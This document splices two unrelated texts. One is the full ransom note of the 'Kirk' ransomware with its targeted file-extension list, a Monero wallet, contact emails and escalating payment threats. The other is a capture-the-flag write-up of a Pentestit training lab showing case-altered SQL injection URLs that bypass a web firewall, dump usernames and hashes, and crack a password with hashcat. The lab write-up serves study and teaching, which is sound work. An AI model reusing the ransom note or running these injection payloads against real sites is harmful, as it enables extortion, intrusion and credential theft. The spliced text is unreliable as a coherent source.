.cfr,  .ytd,  .sngw,  .tst,  .skudef,  .dem,  .sims3pack,  .hbr,  .hkx,  .rgt,  .ggpk,  .ttarch2,  .hogg,  .spv,  .bm2,  .lua,  .dff,  .save,  .rgssad,  .scm,  .aud,  .rxdata,  .mcmeta,  .bin,  .mpqe,  .rez,  .xbe,  .grle,  .bf,  .iwd,  .vpp_pc,  .scb,  .naz,  .m2,  .xpk,  .sabs,  .nfs13save,  .gro,  .emi,  .wad,  .15,  .vfs,  .drs,  .taf,  .m4s,  .player,  .umv,  .sgm,  .ntl,  .esm,  .qvm,  .arch00,  .tir,  .bk,  .sabl,  .bin,  .opk,  .vfs0,  .xp3,  .tobj,  .rcf,  .sga,  .esf,  .rpack,  .DayZProfile,  .qsv,  .gam,  .bndl,  .u2car,  .psk,  .gob,  .lrf,  .lts,  .iqm,  .i3d,  .acm,  .SC2Replay,  .xfbin,  .db0,  .fsh,  .dsb,  .cry,  .osr,  .gcv,  .blk,  .4,  .lzc,  .umod,  .w3x,  .mwm,  .crf,  .tad,  .pbn,  .14,  .ppe,  .ydc,  .fmf,  .swe,  .nfs11save,  .tgx,  .trf,  .atlas,  .20,  .game,  .rw,  .rvproj2,  .sc1,  .ed,  .lsd,  .pkz,  .rim,  .bff,  .gct,  .9,  .fpk,  .pk3,  .osf,  .bns,  .cas,  .lfl,  .rbz,  .sex,  .mrm,  .mca,  .hsv,  .vpt,  .pff,  .i3chr,  .tor,  .01,  .utx,  .kf,  .dzip,  .fxcb,  .modpak,  .ydr,  .frd,  .bmd,  .vpp,  .gcm,  .frw,  .baf,  .edf,  .w3g,  .mtf,  .tfc,  .lpr,  .pk2,  .cs2,  .fps,  .osz,  .lnc,  .jpz,  .tinyid,  .ebm,  .i3exec,  .ert,  .sv4,  .cbf,  .oppc,  .enc,  .rmv,  .mta,  .otd,  .pk7,  .gm,  .cdp,  .cmg,  .ubi,  .hpk,  .plr,  .mis,  .ids,  .replay_last_battle,  .z2f,  .map,  .ut4mod,  .dm_1,  .p3d,  .tre,  .package,  .streamed,  .l2r,  .xbf,  .wep,  .evd,  .dxt,  .bba,  .profile,  .vmt,  .rpf,  .ucs,  .lab,  .cow,  .ibf,  .tew,  .bix,  .uhtm,  .txd,  .jam,  .ugd,  .13,  .dc6,  .vdk,  .bar,  .cvm,  .wso,  .xxx,  .zar,  .anm,  .6,  .ant,  .ctp,  .sv5,  .dnf,  .he0,  .mve,  .emz,  .e4mod,  .gxt,  .bag,  .arz,  .tbi,  .itp,  .i3animpack,  .vtf,  .afl,  .ncs,  .gaf,  .ccw,  .tsr,  .bank,  .lec,  .pk4,  .psv,  .los,  .civ5save,  .rlv,  .nh,  .sco,  .ims,  .epc,  .rgm,  .res,  .wld,  .sve,  .db1,  .dazip,  .vcm,  .rvm,  .eur,  .me2headmorph,  .azp,  .ags,  .12,  .slh,  .cha,  .wowsreplay,  .dor,  .ibi,  .bnd,  .zse,  .ddsx,  .mcworld,  .intr,  .vdf,  .mtr,  .addr,  .blp,  .mlx,  .d2i,  .21,  .tlk,  .gm1,  .n2pk,  .ekx,  .tas,  .rav,  .ttg,  .spawn,  .osu,  .oac,  .bod,  .dcz,  .mgx,  .wowpreplay,  .fuk,  .kto,  .fda,  .vob,  .ahc,  .rrs,  .ala,  .mao,  .udk,  .jit,  .25,  .swar,  .nav,  .bot,  .jdf,  .32,  .mul,  .szs,  .gax,  .xmg,  .udm,  .zdk,  .dcc,  .blb,  .wxd,  .isb,  .pt2,  .utc,  .card,  .lug,  .JQ3SaveGame,  .osk,  .nut,  .unity,  .cme,  .elu,  .db7,  .hlk,  .ds1,  .wx,  .bsm,  .w3z,  .itm,  .clz,  .zfs,  .3do,  .pac,  .dbi,  .alo,  .gla,  .yrm,  .fomod,  .ees,  .erp,  .dl,  .bmd,  .pud,  .ibt,  .24,  .wai,  .sww,  .opq,  .gtf,  .bnt,  .ngn,  .tit,  .wf,  .bnk,  .ttz,  .nif,  .ghb,  .la0,  .bun,  .11,  .icd,  .z3,  .djs,  .mog,  .2da,  .imc,  .sgh,  .db9,  .42,  .vis,  .whd,  .pcc,  .43,  .ldw,  .age3yrec,  .pcpack,  .ddt,  .cok,  .xcr,  .bsp,  .yaf,  .swd,  .tfil,  .lsd,  .blorb,  .unr,  .mob,  .fos,  .cem,  .material,  .lfd,  .hmi,  .md4,  .dog,  .256,  .eix,  .oob,  .cpx,  .cdata,  .hak,  .phz,  .stormreplay,  .lrn,  .spidersolitairesave-ms,  .anm,  .til,  .lta,  .sims2pack,  .md2,  .pkx,  .sns,  .pat,  .tdf,  .cm,  .mine,  .rbn,  .uc,  .asg,  .raf,  .myp,  .mys,  .tex,  .cpn,  .flmod,  .model,  .sfar,  .fbrb,  .sav2,  .lmg,  .tbc,  .xpd,  .bundledmesh,  .bmg,  .18,  .gsc,  .shader_bundle,  .drl,  .world,  .rwd,  .rwv,  .rda,  .3g2,  .3gp,  .asf,  .asx,  .avi,  .flv,  .ai,  .m2ts,  .mkv,  .mov,  .mp4,  .mpg,  .mpeg,  .mpeg4,  .rm,  .swf,  .vob,  .wmv,  .doc,  .docx,  .pdf,  .rar,  .jpg,  .jpeg,  .png,  .tiff,  .zip,  .7z,  .dif.z,  .exe,  .tar.gz,  .tar,  .mp3,  .sh,  .c,  .cpp,  .h,  .mov,  .gif,  .txt,  .py,  .pyc,  .jar,  .csv,  .psd,  .wav,  .ogg,  .wma,  .aif,  .mpa,  .wpl,  .arj,  .deb,  .pkg,  .db,  .dbf,  .sav,  .xml,  .html,  .aiml,  .apk,  .bat,  .bin,  .cgi,  .pl,  .com,  .wsf,  .bmp,  .bmp,  .gif,  .tif,  .tiff,  .htm,  .js,  .jsp,  .php,  .xhtml,  .cfm,  .rss,  .key,  .odp,  .pps,  .ppt,  .pptx,  .class,  .cd,  .java,  .swift,  .vb,  .ods,  .xlr,  .xls,  .xlsx,  .dot,  .docm,  .dotx,  .dotm,  .wpd,  .wps,  .rtf,  .sdw,  .sgl,  .vor,  .uot,  .uof,  .jtd,  .jtt,  .hwp,  .602,  .pdb,  .psw,  .xlw,  .xlt,  .xlsm,  .xltx,  .xltm,  .xlsb,  .wk1,  .wks,  .123,  .sdc,  .slk,  .pxl,  .wb2,  .pot,  .pptm,  .potx,  .potm,  .sda,  .sdd,  .sdp,  .cgm,  .wotreplay,  .rofl,  .pak,  .big,  .bik,  .xtbl,  .unity3d,  .capx,  .ttarch,  .iwi,  .rgss3a,  .gblorb,  .xwm,  .j2e,  .mpk,  .xex,  .tiger,  .lbf,  .cab,  .rx3,  .epk,  .vol,  .asset,  .forge,  .lng,  .sii,  .litemod,  .vef,  .dat,  .papa,  .psark,  .ydk,  .mpq,  .wtf,  .bsa,  .re4,  .dds,  .ff,  .yrp,  .pck,  .t3,  .ltx,  .uasset,  .bikey,  .patch,  .upk,  .uax,  .mdl,  .lvl,  .qst,  .ddv,  .pta

Ransom Note Text:


                     :xxoc;;,..                                        .
                    cWW0olkNMMMKdl;.                       .;llxxklOc,'
                   oWMKxd,  .,lxNKKOo;.                  :xWXklcc;.     ...'.
           k      lMMNl   .    ON.                         :c.             ''.  ':....
          .WXc   ;WMMMXNNXKKxdXMM.                                                .    .
          .NdoK: XMMMMMMMMMMMMMMM;oo;                                ...;,cxxxll.       .
          .WX.K0'WMMMWMMMMMWMNXWMooMWNO'                         ..,;OKNWWWWMMMMMXk:.
           KK:xKKWMMMXNMMMMW;  .. :WNKd,                ..    .'cdOXKXNNNNNWWMMMMMMMW0,
           lNMXXMMMMMMMMWWMMWKk,  ;0k'                    .,cxxk0K0O0XXWWMMMMMMMMMMMMMMX:..   ..
            ..,;XMMMMMMMWXWWK0KK: .;.                    .:lddddxOOO0XWMMMMMMMMMMMMMMMMMMO.    .,
              .kKXMMMMMWkoxolcc;..                      .':loodxO00OO0NNXNWMMMMMMMMMMMMMMMN;     '.
              .MK;kWMMMWWKOc.  .                        ..';cdxkKNX0kOOOKNMMMMMMMMMMMMMMMMMW:    .
              ,MW:,:x0NMMMMWW0x'                          ..,:dXNWW0xkkKWMMMMMMMMMMMMMMMMMMWk.  ..
              oMMN;    ;odoccc;c:.                         ...lXWWMOok0NMMMMMWNXKXKXWMMMMMMMOc.
              XMMMX,                                    ....';lldkWkodK0loc'.  .'lxx0kOKNMMMXo.
            'XMMMMMNc                                            .dldXWx.      ..,,coOXOkXMMMK,
       ,.   .:dk0KNWMk.                                 ...        .kWMK,.  ..:c .:.. .0MWMMMMO.
  .':x0K0:.          ..   .                                 .      .OWMNNXO:cccdxKXWMW0o0WWMMMM;.
 00000000000kdl:,'.                                      ..'o00l   'KMMNKNWWNKXWWMMMMMMMMMMMMMM0.
 0000000000000000000Oxl:'                                .;xKWWx  .xNMMMWNMMMMMMMMMMMMMMMMMMMMMMl
 0000000000000000000000000x;. ..,::,.                  .ck0KKk'   '0WMMMMMMMWWMMMMMMMMMMMMMMMMMM0.   .'
 0000000000000000000000000000Oxdllc:;,....,'...       .cdkOko:     ,cOKKXWMMMKd0WMMMMMMMMMMMMMWW0. 'Kc:,
 000000000000000000000000000000000OkkkxdoodxOkoooool   .;okOx,       .,'...cKMXl'oKWMMMMMMMWWNXN0  'MMc0.
 0000OO000000000000000000000000000000000000000kc.      .:dk0c         ,KNKxdKMMM0;;kMMMMMMMMWNKXO  ,kW0xl
 OdloxO000000000000000000000000000000000000000000x,     .,ll;      .lokKWMMMMMMMMM0xNMMMMMMMNXXNo.xK;cXKx
 lx000000000000000000000000000000000000000000000000l     .'..    .'cKWXOXMMMMMMMMMMMMMMMMMWWNXXNKX0MNkNK0..
 00000000000000000000000000000000000000000000000000O      ..    ..,;ok0X000KKXWMNNMMMMMMMMNNXKKXX00MMMWWc',
 00000000000000000000000000000000000000000000000000d              .. ..........;;.cKMMMMMWNXKKXNKxkNMMX,
 000000000000000000000000000000000000000Ko.0000000Ol                .'::odkkOOOxxxoxNMMMMNNWNXKK0k..;'
 0000000000000000000000000000000000000000..:000000kl             .:coododkXWMMMMMMMWWMMMNNNNNKOkkx:
 :;ok00000000000000000000000000000000000O.;.d00000dc        ...   .........cONMMMMMMMMMNXXXN0dlddxN.
 .dk000000000000000000000000000000000000;ld,.O00kocc        ..    ...,;::lokKNMMMMMMMMWKOO0OxloocxM:
 OO0000000000000000000000000000000000000ol0Koc0xc:ll  .         ..;lxO0XNNMMMMMMMMMMMN0xoxOdl::,;0Md
 :;,'..;loxk000000000000000000000000000000000lx..loo ,0          .'';lkKKNMMMMMMMMMNOd:;lc:;'..,kWMK
 cccldxkkkO00Okdooddxk00000000000000000000000Oc'lddl dK,            .':ollokOOOOOOOc'.........lXMMMM,
 000000kdoc,....;cldkO0000000000000000000000Okdodddo'K0'.                   .......        .oKMMMMMM0
 :,'....',;:ldkO0000000000000000000000000000Okxodddd;Xk,...                              .l0NMMMMMMMM:
 OO000000000000000000000000000000000000000000OkodxxxoXo,,,..                           .:kKWMMMMMMMMMW'
 dO0000000000000000000000000000000000000000000OodxxxkKl;,,,,                          'dOKWMMMMMMMMMMMX

      _  _____ ____  _  __   ____      _    _   _ ____   ___  __  ____        ___    ____  _____ 
     | |/ /_ _|  _ \| |/ /  |  _ \    / \  | \ | / ___| / _ \|  \/  \ \      / / \  |  _ \| ____|
     | ' / | || |_) | ' /   | |_) |  / _ \ |  \| \___ \| | | | |\/| |\ \ /\ / / _ \ | |_) |  _|  
     | . \ | ||  _ <| . \   |  _ <  / ___ \| |\  |___) | |_| | |  | | \ V  V / ___ \|  _ <| |___ 
     |_|\_\___|_| \_\_|\_\  |_| \_\/_/   \_\_| \_|____/ \___/|_|  |_|  \_/\_/_/   \_\_| \_\_____|


Oh no! The Kirk ransomware has encrypted your files!


-----------------------------------------------------------------------------------------------------

> ! IMPORTANT ! READ CAREFULLY:

Your computer has fallen victim to the Kirk malware and important files have been encrypted - locked
up so they don't work. This may have broken some software, including games, office suites etc.

Here's a list of some the file extensions that were targetted:

    .3g2      .rar      .jar      .cgi      .class    .jtd      .potx     .xex      .dds      
    .3gp      .jpg      .csv      .pl       .cd       .jtt      .potm     .tiger    .ff       
    .asf      .jpeg     .psd      .com      .java     .hwp      .sda      .lbf      .yrp      
    .asx      .png      .wav      .wsf      .swift    .602      .sdd      .cab      .pck      
    .avi      .tiff     .ogg      .bmp      .vb       .pdb      .sdp      .rx3      .t3       
    .flv      .zip      .wma      .bmp      .ods      .psw      .cgm      .epk      .ltx      
    .ai       .7z       .aif      .gif      .xlr      .xlw      .wotreplay.vol      .uasset   
    .m2ts     .dif.z    .mpa      .tif      .xls      .xlt      .rofl     .asset    .bikey    
    .mkv      .exe      .wpl      .tiff     .xlsx     .xlsm     .pak      .forge    .patch    
    .mov      .tar.gz   .arj      .htm      .dot      .xltx     .big      .lng      .upk      
    .mp4      .tar      .deb      .js       .docm     .xltm     .bik      .sii      .uax      
    .mpg      .mp3      .pkg      .jsp      .dotx     .xlsb     .xtbl     .litemod  .mdl      
    .mpeg     .sh       .db       .php      .dotm     .wk1      .unity3d  .vef      .lvl      
    mpeg4     .c        .dbf      .xhtml    .wpd      .wks      .capx     .dat      .qst      
    .rm       .cpp      .sav      .cfm      .wps      .123      .ttarch   .papa     .ddv      
    .swf      .h        .xml      .rss      .rtf      .sdc      .iwi      .psark    .pta      
    .vob      .mov      .html     .key      .sdw      .slk      .rgss3a   .ydk                
    .wmv      .gif      .aiml     .odp      .sgl      .pxl      .gblorb   .mpq                
    .doc      .txt      .apk      .pps      .vor      .wb2      .xwm      .wtf                
    .docx     .py       .bat      .ppt      .uot      .pot      .j2e      .bsa                
    .pdf      .pyc      .bin      .pptx     .uof      .pptm     .mpk      .re4                

There are an additional 441 file extensions that are targetted. They are mostly to do with games.

To get your files back, you need to pay. Now. Payments recieved more than 48 hours after the time of
infection will be charged double. Further time penalties are listed below. The time of infection has
been logged.

Any files with the extensions listed above will now have the extra extension '.kirked', these files
are encrypted using military grade encryption.

In the place you ran this program from, you should find a note (named RANSOM_NOTE.txt) similar to this one.
You will also find a file named 'pwd' - this is your encrypted password file. Although it was
generated by your computer, you have no way of ever decrypting it. This is due to the security
of both the way it was generated and the way it was encrypted. Your files were encrypted using
this password.

 ____  ____   ___   ____ _  __   _____ ___     _____ _   _ _____    ____  _____ ____   ____ _   _ _____ _ 
/ ___||  _ \ / _ \ / ___| |/ /  |_   _/ _ \   |_   _| | | | ____|  |  _ \| ____/ ___| / ___| | | | ____| |
\___ \| |_) | | | | |   | ' /     | || | | |    | | | |_| |  _|    | |_) |  _| \___ \| |   | | | |  _| | |
 ___) |  __/| |_| | |___| . \     | || |_| |    | | |  _  | |___   |  _ <| |___ ___) | |___| |_| | |___|_|
|____/|_|    \___/ \____|_|\_\    |_| \___/     |_| |_| |_|_____|  |_| \_\_____|____/ \____|\___/|_____(_)

  "Logic, motherfucker." ~ Spock.


Decrypting your files is easy. Take a deep breath and follow the steps below.

 1 ) Make the proper payment.
     Payments are made in Monero. This is a crypto-currency, like bitcoin.
     You can buy Monero, and send it, from the same places you can any other
     crypto-currency. If you're still unsure, google 'bitcoin exchange'.

     Sign up at one of these exchange sites and send the payment to the address below.

     Make note of the payment / transaction ID, or make one up if you have the option.

    Payment Address (Monero Wallet):
      4AqSwfTexbNaHcn8giSJw3KPiWYHGBaCF9bdgPxvHbd5A8Q3Fc7n6FQCReEns8uEg8jUo4BeB79rwf4XSfQPVL1SKdVp2jz

      Prices:
        Days   :  Monero  : Offer Expires
        0-2    :  50      : 03/18/17 15:32:14
        3-7    :  100     : 03/23/17 15:32:14
        8-14   :  200     : 03/30/17 15:32:14
        15-30  :  500     : 04/15/17 15:32:14

    Note: In 31 days your password decryption key gets permanently deleted.
          You then have no way to ever retrieve your files. So pay now.

 2 ) Email us.
     Send your pwd file as an email attachment to one of the email addresses below.
     Include the payment ID from step 1.

     Active email addresses:
        kirk.help@scryptmail.com
        kirk.payments@scryptmail.com

 3 ) Decrypt your files.
     You will recieve your decrypted password file and a program called 'Spock'.
     Download these both to the same place and run Spock.
     Spock reads in your decrypted password file and uses it to decrypt all of the
     affected files on your computer.

     > IMPORTANT !
       The password is unique to this infection.
       Using an old password or one from another machine will result in corrupted files.
       Corrupted files cannot be retrieved.
       Don't fuck around.

 4 ) Breathe.


       _     _____     _______    _     ___  _   _  ____ 
      | |   |_ _\ \   / / ____|  | |   / _ \| \ | |/ ___|
      | |    | | \ \ / /|  _|    | |  | | | |  \| | |  _ 
      | |___ | |  \ V / | |___   | |__| |_| | |\  | |_| |
      |_____|___|  \_/  |_____|  |_____\___/|_| \_|\____|
                         _    _   _ ____     ____  ____   ___  ____  ____  _____ ____  
                        / \  | \ | |  _ \   |  _ \|  _ \ / _ \/ ___||  _ \| ____|  _ \ 
                       / _ \ |  \| | | | |  | |_) | |_) | | | \___ \| |_) |  _| | |_) |
                      / ___ \| |\  | |_| |  |  __/|  _ <| |_| |___) |  __/| |___|  _ < 
                     /_/   \_\_| \_|____/   |_|   |_| \_\\___/|____/|_|   |_____|_| \_\



Full version of the Ransom Note:

Full Ransom Note

Pentestit Lab v10 – The Site Token

In my previous post “Pentestit Lab v10 – The Mail Token”, we attained usernames through Intelligence Gathering, brute forced the SMTP Service, attained login credentials, and scored our first token. Today we will take our first steps at compromising the Global Data Security website – which will include the following:

  • Mapping the Attack Surface & Defenses
  • Exploiting SQL Injection w/ WAF Bypass
  • Cracking SQL Hashes
  • Finding the Site Token

If you are reading this post for the first time, and have no clue on what’s going on – then I suggest you start from the beginning and read “Pentestit Lab v10 – Introduction & Setup”.

I also included a ton of resources in my second post that I linked above – you should seriously check that out if you already haven’t!

Mapping the Attack Surface & Defenses:

Whenever we attempt to attack a web application, we have to start by mapping out the web app and its associated structure. That means finding directories, hidden links, files, URL Query’s, etc.

Once we mapped our application – we can start by looking for vulnerabilities such as SQL Injection, XSS, Path Traversal, etc.

For the Global Data Security website (which I will call GDS from now on), I considered the Security Blog a good starting point.

192.168.101.9 443 - Security Blog
192.168.101.9 443 – Security Blog

After going through all the links on the website, I noticed a particular URL parameter in the blog posts that caught my eye.

192.168.101.9 mobile hack test page

Notice the id parameter being passed into the URL after post.php? We can actually test this parameter for SQL Injection!

Exploiting SQL Injection w/ WAF Bypass:

I began trying to exploit the id parameter, but for some reason every time I injected some SQL code, I was taken back to the home page.

This made me consider that there might be a WAF or Web Application Firewall in place, preventing me from exploiting this SQL Injection.

I decided to attempt a Case Change Bypass to see if I can somehow bypass the filter. This is due to the fact that some WAF’s only filter lowercase SQL keywords.

I began by injecting the following into the URL:

http://192.168.101.9:443/post.php?id=%27%29+UniOn+SeLecT+1,2%23

After submitting the query – you can see that the SQL Injection is in fact there, and that the Case Change allowed me to bypass the WAF filter.

192.168.101.9 sql inject testing 1-2

Now that we got the SQL Injection to work – let’s start by pulling all the tables in the database with the following:

http://192.168.101.9:443/post.php?id=%27%29+UniOn+SeLecT+1,GroUp_ConCaT%28taBlE_SCheMa,0x20a,TAblE_NaME%29+FrOm+iNfOrmaTioN_scHeMa.TabLeS+WHerE+tAblE_SchEma=DaTabAsE%28%29%23

192.168.101.9 sql inject test page

Nice! Now that we got our table names, let’s pull all the columns from the “site” table.

http://192.168.101.9:443/post.php?id=%27%29+UniOn+SeLecT+1,GroUp_ConCaT%28TAblE_NaME,0x20,CoLumN_NaME%29+FrOm+iNfOrmaTioN_scHeMa.ColUmNs+WHerE+tAblE_SchEma=%27site%27%23

 

192.168.101.9 sql inject testing tables

We see that the users table has a username and password column, so let’s go ahead and dump any data in those columns.

http://192.168.101.9:443/post.php?id=%27%29+UniOn+SeLecT+1,GroUp_ConCaT%28useRnAMe,0x20,paSswOrD%29+FrOm+site.users%23

 

192.168.101.9 sql inject lindsey

Cracking MySQL Hashes:

Awesome, we got another username, and a SQL Hash of the associated user’s password. Let’s first start by saving the username for future reference, along with the other usernames we have.

root@kali:~/gds# nano names
root@kali:~/gds# cat names 
a.modlin@gds.lab
s.locklear@gds.lab
j.wise@gds.lab
e.lindsey@gds.lab

Since we got a SQL Hash, let’s use hash-identifier to see what type of hash it is. Then, we can use HashCat to try and crack it!

root@kali:~/gds# nano lindsey_hash
root@kali:~/gds# cat lindsey_hash 
$1$w9aURG9k$Wf1VIpv9VET3v3VWZ4YD8.


root@kali:~/gds# hash-identifier
   #########################################################################
   #	 __  __ 		    __		 ______    _____	   #
   #	/\ \/\ \		   /\ \ 	/\__  _\  /\  _ `\	   #
   #	\ \ \_\ \     __      ____ \ \ \___	\/_/\ \/  \ \ \/\ \	   #
   #	 \ \  _  \  /'__`\   / ,__\ \ \  _ `\	   \ \ \   \ \ \ \ \	   #
   #	  \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \	    \_\ \__ \ \ \_\ \	   #
   #	   \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/	   #
   #	    \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.1 #
   #								 By Zion3R #
   #							www.Blackploit.com #
   #						       Root@Blackploit.com #
   #########################################################################

   -------------------------------------------------------------------------
 HASH: $1$w9aURG9k$Wf1VIpv9VET3v3VWZ4YD8. 

Possible Hashs:
[+]  MD5(Unix)

   -------------------------------------------------------------------------

root@pentestit:~# hashcat -m 500 -a o lindsey_hash /usr/share/wordlists/rockyou.txt
Initializing hashcat v2.00 with 2 threads and 32mb segment-size...

Skipping line: cat lindsey_hash (signature unmatched)
Added hashes from file lindsey_hash: 1 (1 salts)
Activating quick-digest mode for single-hash with salt

[s]tatus [p]ause [r]esume [b]ypass [q]uit => r
$1$w9aURG9k$Wf1VIpv9VET3v3VWZ4YD8.:lindsey123
                                            
All hashes have been recovered

Input.Mode: Dict (/usr/share/wordlists/rockyou.txt)
Index.....: 1/5 (segment), 3605274 (words), 33550339 (bytes)
Recovered.: 1/1 hashes, 1/1 salts
Speed/sec.: - plains, 20.45k words
Progress..: 166528/3605274 (4.62%)
Running...: 00:00:00:09
Estimated.: 00:00:02:48


Started: Mon Mar 20 07:46:37 2017
Stopped: Mon Mar 20 07:46:46 2017

After some time we see that the MD5 Hash is that of the password lindsey123.

Finding the Site Token:

Since we were able to compromise a username and password, we need to find a place where we can leverage these credentials.

At this point, I decide to run dirb to try and enumerate any interesting directories that I might have missed.

root@pentestit:~# dirb http://192.168.101.9:443

-----------------
DIRB v2.22 
By The Dark Raver
-----------------

START_TIME: Mon Mar 20 07:50:58 2017
URL_BASE: http://192.168.101.9:443/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612 

---- Scanning URL: http://192.168.101.9:443/ ----
==> DIRECTORY: http://192.168.101.9:443/admin/ 
==> DIRECTORY: http://192.168.101.9:443/css/ 
==> DIRECTORY: http://192.168.101.9:443/img/ 
+ http://192.168.101.9:443/index.php (CODE:200|SIZE:7343) 
==> DIRECTORY: http://192.168.101.9:443/js/ 
==> DIRECTORY: http://192.168.101.9:443/mail/ 
==> DIRECTORY: http://192.168.101.9:443/vendor/ 
 
---- Entering directory: http://192.168.101.9:443/admin/ ----
+ http://192.168.101.9:443/admin/index.php (CODE:302|SIZE:0) 
 
---- Entering directory: http://192.168.101.9:443/css/ ----
 
---- Entering directory: http://192.168.101.9:443/img/ ----
 
---- Entering directory: http://192.168.101.9:443/js/ ----

---- Entering directory: http://192.168.101.9:443/mail/ ----

---- Entering directory: http://192.168.101.9:443/vendor/ ----
==> DIRECTORY: http://192.168.101.9:443/vendor/jquery/ 
 
---- Entering directory: http://192.168.101.9:443/vendor/jquery/ ----
 
-----------------
END_TIME: Mon Mar 20 08:00:01 2017
DOWNLOADED: 36896 - FOUND: 2

The admin console looks promising! So let’s go ahead and log in there!

192.168.101.9 site login and token

 

Once logged in, you should automatically see the Site Token on the main page.

Token (2/13):

We found the token! Go ahead and submit it on the main page to gain points for it!

I didn’t post the actual token. Because, what would be the fun in that if I did? Go through and actually try to compromise the Blog to get the token!

Site  Token complete.PNG

You learn by practical work, so go through this walkthrough, and the lab – and learn something new!

That’s all for now, stay tuned for the next post to compromise the next Token (3/13) – The SSH Token!